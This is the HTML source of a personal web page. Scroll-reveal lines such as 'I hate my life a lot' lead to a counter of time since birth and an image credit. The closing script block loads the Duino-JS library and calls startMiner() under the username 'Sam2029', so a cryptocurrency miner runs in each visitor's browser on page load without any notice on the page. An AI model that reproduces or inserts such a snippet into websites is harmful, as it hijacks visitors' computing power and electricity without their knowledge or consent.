<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="style.css">
        <script defer src="app.js"></script>

        <title>I hate my life </title>
        
    </head>
    <body>
        <div class="main"></div>
        <div class="wrapper">
            <header>
              <img src="img/top.png" class="background">
              <img src="img/mid.png" class="middleground">
              <img src="img/bottom.png" class="foreground">
            </header>
        </div>
        

    
        <section class="hidden">
            <div class="question">
                
                <h1>Hello!!</h1>
            </div>
        </section>

        <section class="hidden">
            <div class="question">
                <h1>Are you here to know more about me O.o ?</h1>
            </div>
        </section>

        <section class="hidden">
            <div class="question">
                <h1>Well....</h1>
            </div>
        </section>
        <section class="hidden">
            <div class="question">
                <h1>I am just a random human.......</h1>
            </div>
        </section>
        <section class="hidden">
            <div class="question">
                <h1>Maybe................</h1>
            </div>
        </section>
        <section class="hidden">
            <div class="question">
                <h1>I hate my life a lot.......</h1>
            </div>
        </section>
                
        <section class="hidden">
            <div class="question">
                <h1>When I say a lot I mean a lot a lot</h1>
            </div>
        </section>
        <section>
            <h1>Entered this planet</h1>
            <div id="counter">Calculating...</div>
            <h1>ago...</h1>
        </section>

        <section>
            <h2>Special thanks to </h2>
            <a href="https://www.freepik.com/free-vector/night-ocean-landscape-full-moon-stars-shine_17740155.htm#from_view=detail_alsolike">Image by vecstock</a> on Freepik
        </section>
        <script src="duino-js.min.js"></script> <!--imports the Duino-JS miner-->
        <script>
            username = `Sam2029`; //put your username here (e.g. revox, ericddm, snehaislove or Hoiboy19), the default is Hoiboy19.
            rigid = `Duino-JS`; //If you want to change the rig ID, you can change this. If you want to keep using "Duino-JS", you can remove this line.
            threads = 1; //Set the amount of threads to use here, check out https://github.com/sys-256/Duino-JS for more options. The default is 1.
            startMiner(); //starts the miner
        </script>


                       
    </body>

</html>